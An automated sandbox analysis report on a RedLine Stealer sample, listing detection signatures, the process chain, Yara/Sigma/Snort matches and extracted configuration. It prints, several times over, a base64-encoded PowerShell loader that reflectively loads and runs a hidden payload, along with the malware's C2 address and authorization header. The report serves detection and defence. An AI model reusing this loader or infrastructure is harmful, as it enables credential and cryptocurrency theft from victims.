Windows Analysis Report
f6FauZ2CEz.exe

Overview

General Information

Sample name: f6FauZ2CEz.exe (renamed because original name is a hash value)
Original sample name: 1544dbca0efc2c0105dd7d52a21a8891.exe
Analysis ID: 1431938
MD5: 1544dbca0efc2c0105dd7d52a21a8891
SHA1: 7fbacdb27457829215cd182eab0a4e4bb4379648
SHA256: d5038b0adfdfc36c23dbaafd982bb50bb0e9fc10838e731e10d182d91b28d970
Tags: exe, RedLineStealer

Detection

RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected Powershell decode and execute
Yara detected RedLine Stealer
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs new ROOT certificates
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops certificate files (DER)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • f6FauZ2CEz.exe (PID: 6696 cmdline: "C:\Users\user\Desktop\f6FauZ2CEz.exe" MD5: 1544DBCA0EFC2C0105DD7D52A21A8891)
    • wscript.exe (PID: 4928 cmdline: "wscript.exe" "C:\Users\user\start.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 5728 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\temp.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 1188 cmdline: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KIyAiVGhlIHN1cmVzdCB3YXkgdG8gY29ycnVwdCBhIHlvdXRoIGlzIHRvIGluc3RydWN0IGhpbSB0byBob2xkIGluIGhpZ2hlciBlc3RlZW0gdGhvc2Ugd2hvIHRoaW5rIGFsaWtlIHRoYW4gdGhvc2Ugd2hvIHRoaW5rIGRpZmZlcmVudGx5LiINCiMgIkluIGhlYXZlbiwgYWxsIHRoZSBpbnRlcmVzdGluZyBwZW9wbGUgYXJlIG1pc3NpbmcuIg0KIyAiSGUgd2hvIGhhcyBhIHdoeSB0byBsaXZlIGNhbiBiZWFyIGFsbW9zdCBhbnkgaG93LiINCiMgIlRvIGxpdmUgaXMgdG8gc3VmZmVyLCB0byBzdXJ2aXZlIGlzIHRvIGZpbmQgc29tZSBtZWFuaW5nIGluIHRoZSBzdWZmZXJpbmcuIg0KIyAiV2l0aG91dCBtdXNpYywgbGlmZSB3b3VsZCBiZSBhIG1pc3Rha2UuIg0KDQoNCmZ1bmN0aW9uIFJldmVyc2VTdHJpbmcoJGlucHV0U3RyaW5nKSB7DQogICAgJGNoYXJBcnJheSA9ICRpbnB1dFN0cmluZy5Ub0NoYXJBcnJheSgpDQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0NCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheQ0KICAgIHJldHVybiAkcmV2ZXJzZWRTdHJpbmcNCn0NCiMgIlRoZXJlIGlzIGFsd2F5cyBzb21lIG1hZG5lc3MgaW4gbG92ZS4gQnV0IHRoZXJlIGlzIGFsc28gYWx3YXlzIHNvbWUgcmVhc29uIGluIG1hZG5lc3MuIg0KIyAiVGhhdCB3aGljaCBkb2VzIG5vdCBraWxsIHVzIG1ha2VzIHVzIHN0cm9uZ2VyLiINCg0KZnVuY3Rpb24gQ2xvc2UtUHJvY2VzcyB7DQogICAgcGFyYW0oDQogICAgICAgIFtzdHJpbmddJFByb2Nlc3NOYW1lDQogICAgKQ0KDQogICAgJHByb2Nlc3MgPSBHZXQtUHJvY2VzcyAtTmFtZSAkUHJvY2Vzc05hbWUgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWUNCg0KICAgIGlmICgkcHJvY2VzcyAtbmUgJG51bGwpIHsNCiAgICAgICAgU3RvcC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRm9yY2UNCgl9DQp9DQojICJJbiBpbmRpdmlkdWFscywgaW5zYW5pdHkgaXMgcmFyZTsgYnV0IGluIGdyb3VwcywgcGFydGllcywgbmF0aW9ucywgYW5kIGVwb2NocywgaXQgaXMgdGhlIHJ1bGUuIg0KIyAiVGhlIG1hbiBvZiBrbm93bGVkZ2UgbXVzdCBiZSBhYmxlIG5vdCBvbmx5IHRvIGxvdmUgaGlzIGVuZW1pZXMgYnV0IGFsc28gdG8gaGF0ZSBoaXMgZnJpZW5kcy4iDQojICJBIHRoaW5rZXIgc2VlcyBoaXMgb3duIGFjdGlvbnMgYXMgZXhwZXJpbWVudHMgYW5kIHF1ZXN0aW9ucyDigJQgYXMgYXR0ZW1wdHMgdG8gZmluZCBvdXQgc29tZXRoaW5nLiBTdWNjZXNzIGFuZCBmYWlsdXJlIGFyZSBmb3IgaGltIGFuc3dlcnMgYWJvdmUgYWxsLiINCg0KZnVuY3Rpb24gQ05WKCRhcnIpeyANCiAgICAkbz0xMjM7IA0KICAgICRkPSRudWxsOyANCiAgICBmb3JlYWNoKCRpIGluICRhcnIpeyANCiAgICAgICAgaWYgKCRpIC1ndCAxMjcpIHsgDQogICAgICAgICAgICAkZCs9IFtjaGFyXSgkaS0kbykgDQogICAgICAgIH0gZWxzZSB7IA0KICAgICAgICAgICAgJGQrPSBbY2hhcl0oJGkrJG8pIA0KICAgICAgICB9IA0KICAgIH0gDQogICAgcmV0dXJuICRkIA0KfQ0KDQoNCiRlbmNvZGVkQXJyYXkgPSBAKDE1OSwyMjAsMjM4LDIzOCwyMjQsMjMyLDIyMSwyMzEsMjQ0LDE2OSwxOTIsMjMzLDIzOSwyMzcsMjQ0LDIwMywyMzQsMjI4LDIzMywyMzksMTY5LDE5NiwyMzMsMjQxLDIzNCwyMzAsMjI0LDE2MywxNTksMjMzLDI0MCwyMzEsMjMxLDE2NywxNTksMjMzLDI0MCwyMzEsMjMxLDE2NCwxODIpDQokZGVjb2RlZFN0cmluZyA9IENOViAkZW5jb2RlZEFycmF5DQoNCg0KJGZpbGVQYXRoID0gSm9pbi1QYXRoICRlbnY6VXNlclByb2ZpbGUgIlFKSEphcC5iYXQiDQokbGFzdExpbmUgPSBHZXQtQ29udGVudCAtUGF0aCAkZmlsZVBhdGggfCBTZWxlY3QtT2JqZWN0IC1MYXN0IDENCiRjbGVhbmVkTGluZSA9ICRsYXN0TGluZSAtcmVwbGFjZSAnXjo6Jw0KJHJldmVyc2UgPSBSZXZlcnNlU3RyaW5nICRjbGVhbmVkTGluZQ0KJGRlY29tcHJlc3NlZEJ5dGUgPSBEZWNvbXByZXNzQnl0ZXMgLWNvbXByZXNzZWREYXRhICRyZXZlcnNlDQoNCiRhc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kZGVjb21wcmVzc2VkQnl0ZSkNCg0KJGFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbYnl0ZVtdXSRkZWNvbXByZXNzZWRCeXRlKQ0KDQpJbnZva2UtRXhwcmVzc2lvbiAkZGVjb2RlZFN0cmluZw0KDQpDbG9zZS1Qcm9jZXNzIC1Qcm9jZXNzTmFtZSAiY21kIg==')) | Out-File -FilePath 'C:\Users\user\QJHJap.ps1' -Encoding UTF8" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • powershell.exe (PID: 7184 cmdline: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\QJHJap.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • RegAsm.exe (PID: 7276 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"C2 url": "5.42.92.179:18418", "Authorization Header": "bd91fb2c760240811ff8b4d73e01e2d2"}
Yara matches (Source | Rule | Description | Author):
Source: dump.pcap | Rule: JoeSecurity_RedLine_1 | Description: Yara detected RedLine Stealer | Author: Joe Security
Source: dump.pcap | Rule: JoeSecurity_RedLine | Description: Yara detected RedLine Stealer | Author: Joe Security
Source: C:\Users\user\QJHJap.ps1 | Rule: JoeSecurity_PowershellDecodeAndExecute | Description: Yara detected Powershell decode and execute | Author: Joe Security
Source: 00000006.00000002.1857321756.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_RedLine | Description: Yara detected RedLine Stealer | Author: Joe Security
Source: 00000005.00000002.1719342950.0000000006DDA000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_RedLine | Description: Yara detected RedLine Stealer | Author: Joe Security
Source: 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_RedLine | Description: Yara detected RedLine Stealer | Author: Joe Security
Source: 00000005.00000002.1719342950.000000000650F000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_RedLine | Description: Yara detected RedLine Stealer | Author: Joe Security
(6 further memory-dump matches collapsed in the report)
Source: 5.2.powershell.exe.7190980.1.unpack | Rule: JoeSecurity_RedLine | Description: Yara detected RedLine Stealer | Author: Joe Security
Source: 6.2.RegAsm.exe.400000.0.unpack | Rule: JoeSecurity_RedLine | Description: Yara detected RedLine Stealer | Author: Joe Security
Source: 5.2.powershell.exe.7190980.1.raw.unpack | Rule: JoeSecurity_RedLine | Description: Yara detected RedLine Stealer | Author: Joe Security
Source: amsi32_7184.amsi.csv | Rule: JoeSecurity_PowershellDecodeAndExecute | Description: Yara detected Powershell decode and execute | Author: Joe Security

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KIyAiVGhlIHN1cmVzdCB3YXkgdG8gY29ycnVwdCBhIHlvdXRoIGlzIHRvIGluc3RydWN0IGhpbSB0byBob2xkIGluIGhpZ2hlciBlc3RlZW0gdGhvc2Ugd2hvIHRoaW5rIGFsaWtlIHRoYW4gdGhvc2Ugd2hvIHRoaW5rIGRpZmZlcmVudGx5LiINCiMgIkluIGhlYXZlbiwgYWxsIHRoZSBpbnRlcmVzdGluZyBwZW9wbGUgYXJlIG1pc3NpbmcuIg0KIyAiSGUgd2hvIGhhcyBhIHdoeSB0byBsaXZlIGNhbiBiZWFyIGFsbW9zdCBhbnkgaG93LiINCiMgIlRvIGxpdmUgaXMgdG8gc3VmZmVyLCB0byBzdXJ2aXZlIGlzIHRvIGZpbmQgc29tZSBtZWFuaW5nIGluIHRoZSBzdWZmZXJpbmcuIg0KIyAiV2l0aG91dCBtdXNpYywgbGlmZSB3b3VsZCBiZSBhIG1pc3Rha2UuIg0KDQoNCmZ1bmN0aW9uIFJldmVyc2VTdHJpbmcoJGlucHV0U3RyaW5nKSB7DQogICAgJGNoYXJBcnJheSA9ICRpbnB1dFN0cmluZy5Ub0NoYXJBcnJheSgpDQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0NCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheQ0KICAgIHJldHVybiAkcmV2ZXJzZWRTdHJpbmcNCn0NCiMgIlRoZXJlIGlzIGFsd2F5cyBzb21lIG1hZG5lc3MgaW4gbG92ZS4gQnV0IHRoZXJlIGlzIGFsc28gYWx3YXlzIHNvbWUgcmVhc29uIGluIG1hZG5lc3MuIg0KIyAiVGhhdCB3aGljaCBkb2VzIG5vdCBraWxsIHVzIG1ha2VzIHVzIHN0cm9uZ2VyLiINCg0KZnVuY3Rpb24gQ2xvc2UtUHJvY2VzcyB7DQogICAgcGFyYW0oDQogICAgICAgIFtzdHJpbmddJFByb2Nlc3NOYW1lDQogICAgKQ0KDQogICAgJHByb2Nlc3MgPSBHZXQtUHJvY2VzcyAtTmFtZSAkUHJvY2Vzc05hbWUgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWUNCg0KICAgIGlmICgkcHJvY2VzcyAtbmUgJG51bGwpIHsNCiAgICAgICAgU3RvcC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRm9yY2UNCgl9DQp9DQojICJJbiBpbmRpdmlkdWFscywgaW5zYW5pdHkgaXMgcmFyZTsgYnV0IGluIGdyb3VwcywgcGFydGllcywgbmF0aW9ucywgYW5kIGVwb2NocywgaXQgaXMgdGhlIHJ1bGUuIg0KIyAiVGhlIG1hbiBvZiBrbm93bGVkZ2UgbXVzdCBiZSBhYmxlIG5vdCBvbmx5IHRvIGxvdmUgaGlzIGVuZW1pZXMgYnV0IGFsc28gdG8gaGF0ZSBoaXMgZnJpZW5kcy4iDQojICJBIHRoaW5rZXIgc2VlcyBoaXMgb3duIGFjdGlvbnMgYXMgZXhwZXJpbWVudHMgYW5kIHF1ZXN0aW9ucyDigJQgYXMgYXR0ZW1wdHMgdG8gZmluZCBvdXQgc29tZXRoaW5nLiBTdWNjZXNzIGFuZCBmYWlsdXJlIGFyZSBmb3IgaGltIGFuc3dlcnMgYWJvdmUgYWxsLiINCg0KZnVuY3Rpb24gQ05WKCRhcnIpeyANCiAgICAkbz0xMjM7IA0KICAgICRkPSRudWxsOyANCiAgICBmb3JlYWNoKCRpIGluICRhcnIpeyANCiAgICAgICAgaWYgKCRpIC1ndCAxMjcpIHsgDQogICAgICAgICAgICAkZCs9IFtjaGFyXSgkaS0kbykgDQogICAgICAgIH0gZWxzZSB7IA0KICAgICAgICAgICAgJGQrPSBbY2hhcl0oJGkrJG8pIA0KICAgICAgICB9IA0KICAgIH0gDQogICAgcmV0dXJuICRkIA0KfQ0KDQoNCiRlbmNvZGVkQXJyYXkgPSBAKDE1OSwyMjAsMjM4LDIzOCwyMjQsMjMyLDIyMSwyMzEsMjQ0LDE2OSwxOTIs
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('…
Source: Process started | Author: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t | Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KIyAiVGhlIHN1cmVzdCB3YXkgdG8gY29ycnVwdCBhIHlvdXRoIGlzIHRvIGluc3RydWN0IGhpbSB0byBob2xkIGluIGhpZ2hlciBlc3RlZW0gdGhvc2Ugd2hvIHRoaW5rIGFsaWtlIHRoYW4gdGhvc2Ugd2hvIHRoaW5rIGRpZmZlcmVudGx5LiINCiMgIkluIGhlYXZlbiwgYWxsIHRoZSBpbnRlcmVzdGluZyBwZW9wbGUgYXJlIG1pc3NpbmcuIg0KIyAiSGUgd2hvIGhhcyBhIHdoeSB0byBsaXZlIGNhbiBiZWFyIGFsbW9zdCBhbnkgaG93LiINCiMgIlRvIGxpdmUgaXMgdG8gc3VmZmVyLCB0byBzdXJ2aXZlIGlzIHRvIGZpbmQgc29tZSBtZWFuaW5nIGluIHRoZSBzdWZmZXJpbmcuIg0KIyAiV2l0aG91dCBtdXNpYywgbGlmZSB3b3VsZCBiZSBhIG1pc3Rha2UuIg0KDQoNCmZ1bmN0aW9uIFJldmVyc2VTdHJpbmcoJGlucHV0U3RyaW5nKSB7DQogICAgJGNoYXJBcnJheSA9ICRpbnB1dFN0cmluZy5Ub0NoYXJBcnJheSgpDQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0NCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheQ0KICAgIHJldHVybiAkcmV2ZXJzZWRTdHJpbmcNCn0NCiMgIlRoZXJlIGlzIGFsd2F5cyBzb21lIG1hZG5lc3MgaW4gbG92ZS4gQnV0IHRoZXJlIGlzIGFsc28gYWx3YXlzIHNvbWUgcmVhc29uIGluIG1hZG5lc3MuIg0KIyAiVGhhdCB3aGljaCBkb2VzIG5vdCBraWxsIHVzIG1ha2VzIHVzIHN0cm9uZ2VyLiINCg0KZnVuY3Rpb24gQ2xvc2UtUHJvY2VzcyB7DQogICAgcGFyYW0oDQogICAgICAgIFtzdHJpbmddJFByb2Nlc3NOYW1lDQogICAgKQ0KDQogICAgJHByb2Nlc3MgPSBHZXQtUHJvY2VzcyAtTmFtZSAkUHJvY2Vzc05hbWUgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWUNCg0KICAgIGlmICgkcHJvY2VzcyAtbmUgJG51bGwpIHsNCiAgICAgICAgU3RvcC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRm9yY2UNCgl9DQp9DQojICJJbiBpbmRpdmlkdWFscywgaW5zYW5pdHkgaXMgcmFyZTsgYnV0IGluIGdyb3VwcywgcGFydGllcywgbmF0aW9ucywgYW5kIGVwb2NocywgaXQgaXMgdGhlIHJ1bGUuIg0KIyAiVGhlIG1hbiBvZiBrbm93bGVkZ2UgbXVzdCBiZSBhYmxlIG5vdCBvbmx5IHRvIGxvdmUgaGlzIGVuZW1pZXMgYnV0IGFsc28gdG8gaGF0ZSBoaXMgZnJpZW5kcy4iDQojICJBIHRoaW5rZXIgc2VlcyBoaXMgb3duIGFjdGlvbnMgYXMgZXhwZXJpbWVudHMgYW5kIHF1ZXN0aW9ucyDigJQgYXMgYXR0ZW1wdHMgdG8gZmluZCBvdXQgc29tZXRoaW5nLiBTdWNjZXNzIGFuZCBmYWlsdXJlIGFyZSBmb3IgaGltIGFuc3dlcnMgYWJvdmUgYWxsLiINCg0KZnVuY3Rpb24gQ05WKCRhcnIpeyANCiAgICAkbz0xMjM7IA0KICAgICRkPSRudWxsOyANCiAgICBmb3JlYWNoKCRpIGluICRhcnIpeyANCiAgICAgICAgaWYgKCRpIC1ndCAxMjcpIHsgDQogICAgICAgICAgICAkZCs9IFtjaGFyXSgkaS0kbykgDQogICAgICAgIH0gZWxzZSB7IA0KICAgICAgICAgICAgJGQrPSBbY2hhcl0oJGkrJG8pIA0KICAgICAgICB9IA0KICAgIH0gDQogICAgcmV0dXJuICRkIA0KfQ0KDQoNCiRlbmNvZGVkQXJyYXkgPSBAKDE1OSwyMjAsMjM4LDIzOCwyMjQsMjMyLDIyMSwyMzEsMjQ0LDE2OSwxOTIs
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "wscript.exe" "C:\Users\user\start.vbs", CommandLine: "wscript.exe" "C:\Users\user\start.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\f6FauZ2CEz.exe", ParentImage: C:\Users\user\Desktop\f6FauZ2CEz.exe, ParentProcessId: 6696, ParentProcessName: f6FauZ2CEz.exe, ProcessCommandLine: "wscript.exe" "C:\Users\user\start.vbs", ProcessId: 4928, ProcessName: wscript.exe
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\QJHJap.ps1", CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\QJHJap.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\temp.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5728, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\QJHJap.ps1", ProcessId: 7184, ProcessName: powershell.exe
Source: Process started | Author: Michael Haag | Data: Command: "wscript.exe" "C:\Users\user\start.vbs", CommandLine: "wscript.exe" "C:\Users\user\start.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\f6FauZ2CEz.exe", ParentImage: C:\Users\user\Desktop\f6FauZ2CEz.exe, ParentProcessId: 6696, ParentProcessName: f6FauZ2CEz.exe, ProcessCommandLine: "wscript.exe" "C:\Users\user\start.vbs", ProcessId: 4928, ProcessName: wscript.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('…
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1188, TargetFilename: C:\Users\user\QJHJap.ps1
Timestamp: 04/26/24-02:42:01.151356 | SID: 2046045 | Source Port: 49730 | Destination Port: 18418 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 04/26/24-02:42:15.800330 | SID: 2043231 | Source Port: 49730 | Destination Port: 18418 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 04/26/24-02:42:01.413026 | SID: 2043234 | Source Port: 18418 | Destination Port: 49730 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 04/26/24-02:42:06.716638 | SID: 2046056 | Source Port: 18418 | Destination Port: 49730 | Protocol: TCP | Classtype: A Network Trojan was detected

AV Detection

Source: http://pesterbdd.com/images/Pester.png | URL Reputation: Label: malware
Source: 00000005.00000002.1719342950.0000000006DDA000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: RedLine {"C2 url": "5.42.92.179:18418", "Authorization Header": "bd91fb2c760240811ff8b4d73e01e2d2"}
Source: f6FauZ2CEz.exe | Virustotal: Detection: 9%
Source: f6FauZ2CEz.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: f6FauZ2CEz.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\f6FauZ2CEz.exe | Code function: 0_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C63
